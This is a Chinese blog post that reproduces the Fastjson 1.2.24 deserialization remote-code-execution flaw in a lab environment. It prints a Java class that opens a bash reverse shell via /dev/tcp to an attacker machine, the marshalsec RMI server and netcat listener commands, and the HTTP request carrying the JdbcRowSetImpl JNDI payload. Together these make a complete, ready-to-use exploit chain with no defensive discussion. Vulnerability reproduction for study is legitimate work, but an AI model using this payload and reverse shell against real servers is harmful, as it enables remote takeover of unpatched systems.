Fastjson1.2.24RCE漏洞复现

最新推荐文章于 2024-04-10 02:36:47 发布

L无所不能

最新推荐文章于 2024-04-10 02:36:47 发布

阅读量824

点赞数 1

分类专栏：渗透工具文章标签： linux java 安全

本文链接：https://blog.csdn.net/L1928/article/details/124847402

版权

渗透工具专栏收录该内容

3 篇文章 0 订阅

订阅专栏

1.启动环境并且访问
在这里插入图片描述

2.下载marshalsec-0.0.3-SNAPSHOT-all.jar
3.新建Shell.java文件
import java.lang.Runtime;
import java.lang.Process;
public class shell{
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.168.23.3/9991;cat <&5 | while read line; do $line 2>&5 >&5; done”};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
4.坑：使用低版本jdk 1.8.0 编译！！！，否则可能执行失败
在这里插入图片描述
5.在kali 新建文件夹将shell.class和marshalsec-0.0.3-SNAPSHOT-all.jar 放在同一目录下然后同目录下执行：
python3 -m http.server 8888

Java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIfServer http://192.168.23.3:8888/#shell 1564

nc -lvnp 9991
在这里插入图片描述
6.Burp发送：
POST / HTTP/1.1
Host: 192.168.23.5:8090
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 164

{
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://192.168.23.3:1564/shell”,
“autoCommit”:true
}
}
在这里插入图片描述
7.nc监听：

L无所不能

关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
Fastjson1.2.24RCE漏洞复现

1.启动环境并且访问2.下载marshalsec-0.0.3-SNAPSHOT-all.jar3.新建Shell.java文件import java.lang.Runtime;import java.lang.Process;public class shell{static {try {Runtime rt = Runtime.getRuntime();String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.
复制链接

扫一扫